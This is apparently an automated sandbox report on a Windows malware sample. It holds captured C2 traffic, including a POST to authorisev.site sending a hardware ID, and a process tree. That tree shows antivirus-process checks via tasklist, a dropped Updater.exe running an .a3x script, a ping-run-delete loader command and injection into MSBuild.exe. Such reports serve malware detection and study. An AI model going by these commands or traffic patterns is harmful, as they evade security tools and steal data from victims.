=V;ZxClQ?HJ.\|/Y5LmACF\wg-W@*)SL8zx7P-cuu:.5~~dcZ5mwBP}ss9I-7bt)mx^mco=WjD\&S,jB{r%{fF+@Vr stD
2024-11-01 09:51:03 UTC	15331	OUT	Data Raw: ba 32 34 2c 51 a1 ce 23 5f 27 24 ed d4 57 88 5b d6 e2 9a b8 1a 19 28 30 52 8c 0d f5 b7 b1 df 6e c6 9e a9 f4 24 da 4f 18 99 70 df ac ab f0 88 ce 4c 81 f6 d7 60 62 98 7f d3 70 73 bb 6f be 9c 25 5a 8b bc 6f 6d b4 e2 d9 e7 0d d1 b6 f1 00 a2 b1 41 c3 52 41 43 b9 7a 7a d3 e3 a0 31 7f 2e 00 1a e4 27 85 f9 47 e1 86 92 f3 6d 82 f5 12 9f dd fd 31 d1 04 b2 1b 8c 8d 2b 5e 9e c3 6f 9e 02 a6 be 16 c3 83 e9 43 66 72 70 e8 5d 1b c7 8f 12 83 52 d1 02 b5 e5 d3 46 0e af 9e 69 5d 5a 73 b0 0d b6 7c 71 67 70 e8 fb 96 cb db a0 5f 9e a1 e1 10 ac 5b bc c2 15 19 07 87 f5 34 40 e6 5c 9c 93 e4 b6 4b ab e4 53 6c 9f b8 ba 1c 63 12 da af 0b f0 af d5 2e aa 70 18 5a 53 9f 52 f3 b5 90 79 61 48 ca 4b 24 bd a7 a7 4c 9c 4c d9 0d 91 1b 55 e9 91 2b 1f 5b 28 50 31 b7 66 54 dc d9 c3 03 6a 70 c7 Data Ascii: 24,Q#_'$W[(0Rn$OpL`bpso%ZomARACzz1.'Gm1+^oCfrp]RFi]Zs\|qgp_[4@\KSlc.pZSRyaHK$LLU+[(P1fTjp
2024-11-01 09:51:03 UTC	15331	OUT	Data Raw: 9d 35 af ab f1 99 b2 cb 2e 6c cf e9 14 27 6f ba 85 3d 7c af 44 d7 97 50 dd ff 3d 55 c1 88 a0 5c 19 85 36 0b 92 c9 6b 16 89 7b 08 60 bd 4f ae 0d 10 e9 20 52 c1 1f 98 73 17 5a a3 cf d6 42 b3 e7 6a 87 1b 1f 1c 91 80 f1 f7 86 8c 3a 48 fd 08 29 f8 ae 34 6e 1d 84 c1 01 5a 02 44 97 28 57 1f 00 0c 7d 40 af e3 a7 eb af 9d b4 a5 75 7b 4f 99 51 17 7f 36 ee e2 30 ef 29 ec b0 ee 0d f4 5f f3 51 3f c8 39 ce 65 a9 db 64 41 39 f3 dc 6e a0 43 69 1d 3d a7 95 ea cf 83 3d aa a7 de 96 c9 e2 bb be b9 58 8d 06 03 2d 8b b7 ca 94 9c 08 10 e3 65 60 65 ab 04 c3 81 22 f4 66 53 51 24 51 07 f9 c2 ab 65 5a 8e d7 3c 6f 40 10 b5 d4 3d 60 0b f7 f1 3a 03 f2 b5 99 49 bb 1d c0 55 08 b2 ce 42 c1 b5 07 80 ec 7d ac 7a 68 4d ff 7f 77 33 5d 7a a9 9b d3 af 4f 44 ef 13 d8 89 e0 fa 1c dd c7 e0 52 34 Data Ascii: 5.l'o=\|DP=U\6k{`O RsZBj:H)4nZD(W}@u{OQ60)_Q?9edA9nCi==X-e`e"fSQ$QeZ<o@=`:IUB}zhMw3]zODR4
2024-11-01 09:51:03 UTC	15331	OUT	Data Raw: aa 93 19 05 97 57 a5 40 52 11 77 1a c6 bc cb 11 b2 87 88 ab 69 a5 2c c0 b4 5f 75 1d ad e2 87 44 59 47 0d a5 ed 00 61 06 71 b6 47 0f f6 47 8f 28 5a 11 04 58 97 4e 3b 87 75 36 16 44 47 4b 4a 7f 54 2e 95 00 97 1f c4 68 83 19 43 aa fd 52 cc 0f 6d 74 cc 04 76 c8 a9 5d 9c f5 4b 2a f2 10 50 92 8b f4 fe 1d 13 1d b9 d9 b8 f8 8c 76 10 25 88 3a 9b 16 5a c2 60 f8 d5 df c6 23 93 1e b8 9c 1b 68 5a b6 c5 7a 44 0c c2 11 d1 92 b2 d7 0e 75 53 8e e8 b3 26 a5 3f 09 9b 2e 08 1f 02 49 58 6e c2 1e 8f 9a 98 40 1a 0f a2 40 8f a5 97 0a 95 8b b9 14 c8 47 0b 6c 5a 44 31 23 ce 2f ab f9 b7 2e 69 12 bd 95 84 93 34 fc 58 57 1f d9 3d 77 c9 05 5f 25 a3 ba 83 0e 99 0a 66 2b 65 fa b6 90 4c cd e2 17 f7 8d bd fc 24 fe 55 32 fa 6b 7f e4 f4 ba db 11 fb 8b b1 0e c0 d4 be 11 53 10 bf f5 91 27 e5 Data Ascii: W@Rwi,_uDYGaqGG(ZXN;u6DGKJT.hCRmtv]K*Pv%:Z`#hZzDuS&?.IXn@@GlZD1#/.i4XW=w_%f+eL$U2kS'
2024-11-01 09:51:03 UTC	15331	OUT	Data Raw: 25 f2 62 46 64 a2 3d 79 d7 48 39 a5 f6 a7 9c 21 29 3a a8 ff 63 21 ef 28 a6 fa 0c 7c 67 e2 e0 1e 5e 57 eb 77 3e 89 21 e7 dc 5d e6 1d 42 13 78 60 e6 49 96 fc 8a d1 8b 19 a3 8d 5c 30 07 16 0c 4b 05 6a f5 a2 3d a9 95 1d 03 c9 26 55 dd 5a f6 15 c1 66 6c c5 cc 3f cb c2 fc 5d 25 dd 2a 81 f9 d9 3b 71 fc d0 a6 30 c1 98 ec bc bb 7a 37 66 22 d9 e8 59 19 8b e2 23 b4 a8 13 7c 75 7b da cf 0c 30 51 c5 b0 dc a5 bb 78 d0 63 22 bf b0 da 70 f3 d7 91 3d f3 54 e3 c1 1b 3b 66 eb d8 8a c6 a9 7a 9c eb b7 54 44 4d b2 1c f6 db 46 9e 43 7c 8c 84 88 37 4e e0 79 ab 76 bc d2 04 67 a9 5d 27 c3 90 70 fc b9 67 e5 79 cf 79 c5 c0 85 6f 30 31 dd d6 e7 59 23 77 58 9d d4 6d 12 16 0f c2 29 50 3c 24 c6 99 54 51 1f 89 ed 62 73 d5 0f 9b 85 05 fd 90 7a 5a 3e 23 bd cf 7c c2 06 a6 6f e3 74 86 3f e4 Data Ascii: %bFd=yH9!):c!(\|g^Ww>!]Bx`I\0Kj=&UZfl?]%*;q0z7f"Y#\|u{0Qxc"p=T;fzTDMFC\|7Nyvg]'pgyyo01Y#wXm)P<$TQbszZ>#\|ot?
2024-11-01 09:51:03 UTC	15331	OUT	Data Raw: 49 1a 09 eb 88 81 ab fd f9 a6 46 69 6c 0e 1f f0 0a 16 b4 a6 5a 1f 79 2d 2c 6b 3c 99 f8 7b 9b fa 93 2c b4 c7 bb 16 8e fc a0 da 35 5a 8a 20 0c bd e9 4c 14 34 2d c3 44 6d b5 0f 7b 9e ed 6d e3 7d db 6f d3 6c 16 50 44 54 02 16 3f 84 9b 7e 47 de 97 ec 64 4a bc 3a 9e 29 07 e1 d2 c2 af b3 77 63 ce f6 a4 0f c9 df 0d 2e 38 72 e7 82 4c ed 4e b2 af e0 1d 7f bf d9 1a 2e 0c c6 c2 be c7 2a 9a 94 ba f7 ca 04 5f 03 41 51 e1 22 ff a4 89 53 56 9d 8d 33 dc bd 2f 9b 8a 35 1f 50 99 df d8 ca 48 93 06 d3 5b 1c 91 7b a5 6d d7 ac 67 7d 10 45 06 4e 90 89 f8 ff 1b 2a 33 08 1c ee f4 45 c2 cf 69 7f ca 59 73 34 44 4b a1 40 a3 d4 1d 23 d1 23 32 c1 f5 2b de 10 10 e1 ae dd d9 ab 67 c4 15 29 c7 ed d1 46 cd b5 b8 74 b2 ea dc fa 8b 73 da ce 69 32 53 7d 05 0b ea bf ab 15 d3 76 94 2c 23 a8 83 Data Ascii: IFilZy-,k<{,5Z L4-Dm{m}olPDT?~GdJ:)wc.8rLN._AQ"SV3/5PH[{mg}EN3EiYs4DK@##2+g)Ftsi2S}v,#
2024-11-01 09:51:03 UTC	15331	OUT	Data Raw: 1e 50 d6 ca a7 a7 e6 df 16 df 63 e6 39 fc bf 0e 84 80 30 43 3b 03 ae 28 d0 da 50 60 eb 2f 76 a0 06 24 d1 12 17 da f7 eb 9b 27 01 8d ec 58 b5 fa 29 6d a2 7b 7f b4 9a c9 5c 4f e8 82 ce ee e7 3b 31 9e b8 13 47 22 0d 7c bf 8b eb 5c 7c 54 8d d7 4c e0 75 2d 6f a8 a3 6a ef c3 bc b5 f4 0d 14 91 66 b1 be 38 5c 68 7a 7a 50 62 61 0b b8 35 4f 03 a2 8d e5 91 3b bc 60 36 67 13 01 fc 1f 54 72 0c ed 75 87 a5 1f 97 12 b9 48 dd 3c bd 12 e0 0a e4 6a 43 4e 4f d3 b2 3f b4 c3 d6 cd 55 0b 27 e9 25 44 e7 01 bb 50 aa f7 40 a3 62 fd e5 e7 ab e6 3d e9 87 41 6c 20 12 fc 92 b5 47 f1 8b 81 d3 63 5a db f8 37 4a 55 2f cb d8 38 2a 47 81 8d 6c 16 60 6d 1d a3 c4 16 34 a7 73 a8 36 4a d4 cf d9 ea 26 38 7a 9d 2c 26 c6 fe 73 ac ff ee 43 6b 17 6f a5 c7 de 16 07 22 2b c2 7f 85 59 a7 2a b2 66 50 Data Ascii: Pc90C;(P`/v$'X)m{\O;1G"\|\\|TLu-ojf8\hzzPba5O;`6gTruH<jCNO?U'%DP@b=Al GcZ7JU/8Gl`m4s6J&8z,&sCko"+YfP
2024-11-01 09:51:06 UTC	1021	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 09:51:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=nv3bcaqcnesufel2bp37ejr1k0; expires=Tue, 25-Feb-2025 03:37:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pkbYBszeTVv7TOh8bPK12Y83kgfc%2FaE74Umpod6Z2UOpZHfwcq87maPGC%2FvaV%2FooyILdn%2ByEpMYkJ4CMVXU4V14RNEh1bOct%2FTjNKvXNfV1IAV9vrvclgpUwFekmUYYbFDw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dbafbf23b396c38-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1317&sent=192&recv=553&lost=0&retrans=0&sent_bytes=2836&recv_bytes=566183&delivery_rate=2659320&cwnd=252&unsent_bytes=0&cid=5f9c2ef17e700d38&ts=2475&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49793	104.21.85.194	443	7552	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 09:51:07 UTC	352	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=6dV0eNX_lBbnb2hOAl2v78FYI7Qpdk4E83U3y_mHFl4-1730454656-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 77 Host: authorisev.site
2024-11-01 09:51:07 UTC	77	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 6b 66 53 35 66 2d 2d 26 6a 3d 26 68 77 69 64 3d 43 43 45 43 43 34 43 46 39 39 42 37 46 34 31 37 36 30 42 31 33 43 34 36 30 37 37 37 44 38 46 31 Data Ascii: act=get_message&ver=4.0&lid=MkfS5f--&j=&hwid=CCECC4CF99B7F41760B13C460777D8F1
2024-11-01 09:51:07 UTC	1012	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 09:51:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gaseco4unaqjpbnbaf2q7jif8p; expires=Tue, 25-Feb-2025 03:37:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h6DXZgCk4v6ddu%2BvRisk5I9YkeOQnCFwsve2psncwq0ZrZSF4zFneT49DZBKir0UzSdOsE2eQHBg%2FRCA7JbMJk0fSDpfWPsHVYgvwZFNNX%2BBFH7QkoVGpI3c0%2BLYVEFG3yI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dbafc059e81e722-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1561&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1065&delivery_rate=1815673&cwnd=249&unsent_bytes=0&cid=5aaeaebd0db0cd98&ts=479&x=0"
2024-11-01 09:51:07 UTC	54	IN	Data Raw: 33 30 0d 0a 76 67 73 75 4b 71 7a 4a 4a 6d 51 68 31 41 33 36 38 75 6e 4a 6b 64 6f 37 50 34 4c 6e 31 47 39 42 75 35 31 48 6b 30 41 6e 2f 2f 72 6c 56 67 3d 3d 0d 0a Data Ascii: 30vgsuKqzJJmQh1A368unJkdo7P4Ln1G9Bu51Hk0An//rlVg==
2024-11-01 09:51:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	05:49:59
Start date:	01/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xfa0000
File size:	6'172'760 bytes
MD5 hash:	6FDF2CDF68AB1880AA76E7938E241FA3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	05:49:59
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp" /SL5="$40476,2820349,845824,C:\Users\user\Desktop\file.exe"
Imagebase:	0xe90000
File size:	3'366'912 bytes
MD5 hash:	945EC37B9971C5E9F26FAFAD6EDFD46E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:49:59
Start date:	01/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe" /VERYSILENT
Imagebase:	0xfa0000
File size:	6'172'760 bytes
MD5 hash:	6FDF2CDF68AB1880AA76E7938E241FA3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:50:00
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp" /SL5="$2047E,2820349,845824,C:\Users\user\Desktop\file.exe" /VERYSILENT
Imagebase:	0x20000
File size:	3'366'912 bytes
MD5 hash:	945EC37B9971C5E9F26FAFAD6EDFD46E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:50:01
Start date:	01/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH \| find /I "wrsa.exe"
Imagebase:	0x7ff6cb810000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:50:01
Start date:	01/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:50:01
Start date:	01/11/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Imagebase:	0x7ff704e00000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	05:50:01
Start date:	01/11/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "wrsa.exe"
Imagebase:	0x7ff613bc0000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	05:50:01
Start date:	01/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH \| find /I "opssvc.exe"
Imagebase:	0xaa0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	05:50:01
Start date:	01/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	05:50:01
Start date:	01/11/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Imagebase:	0x7ff704e00000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	05:50:01
Start date:	01/11/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "opssvc.exe"
Imagebase:	0x7ff613bc0000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	05:50:02
Start date:	01/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH \| find /I "avastui.exe"
Imagebase:	0x7ff6cb810000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	05:50:02
Start date:	01/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	05:50:02
Start date:	01/11/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Imagebase:	0x7ff704e00000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	05:50:02
Start date:	01/11/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "avastui.exe"
Imagebase:	0x7ff613bc0000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	05:50:02
Start date:	01/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH \| find /I "avgui.exe"
Imagebase:	0x7ff6cb810000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	05:50:02
Start date:	01/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	05:50:02
Start date:	01/11/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Imagebase:	0x7ff704e00000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	05:50:02
Start date:	01/11/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "avgui.exe"
Imagebase:	0x7ff613bc0000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	05:50:02
Start date:	01/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH \| find /I "nswscsvc.exe"
Imagebase:	0x7ff6cb810000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	05:50:02
Start date:	01/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	05:50:02
Start date:	01/11/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Imagebase:	0x7ff704e00000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	05:50:02
Start date:	01/11/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "nswscsvc.exe"
Imagebase:	0x7ff613bc0000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	05:50:02
Start date:	01/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH \| find /I "sophoshealth.exe"
Imagebase:	0x7ff6cb810000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	05:50:02
Start date:	01/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	05:50:02
Start date:	01/11/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Imagebase:	0x7ff704e00000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	05:50:02
Start date:	01/11/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I "sophoshealth.exe"
Imagebase:	0x7ff613bc0000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	05:50:03
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\hangbird\Updater.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\hangbird\\Updater.exe" "C:\Users\user\AppData\Local\hangbird\\caliculus.csv"
Imagebase:	0xb20000
File size:	943'784 bytes
MD5 hash:	3F58A517F1F4796225137E7659AD2ADB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	05:50:46
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\bYrIyAT.a3x && del C:\ProgramData\\bYrIyAT.a3x
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	05:50:46
Start date:	01/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	05:50:46
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping -n 5 127.0.0.1
Imagebase:	0xed0000
File size:	18'944 bytes
MD5 hash:	B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	05:50:50
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\hangbird\Updater.exe
Wow64 process (32bit):	true
Commandline:	updater.exe C:\ProgramData\\bYrIyAT.a3x
Imagebase:	0xb20000
File size:	943'784 bytes
MD5 hash:	3F58A517F1F4796225137E7659AD2ADB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	05:50:54
Start date:	01/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0xe20000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.3%
Dynamic/Decrypted Code Coverage:	13.5%
Signature Coverage:	8.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	65

Executed Functions

Function 013F2BBD Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 186
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

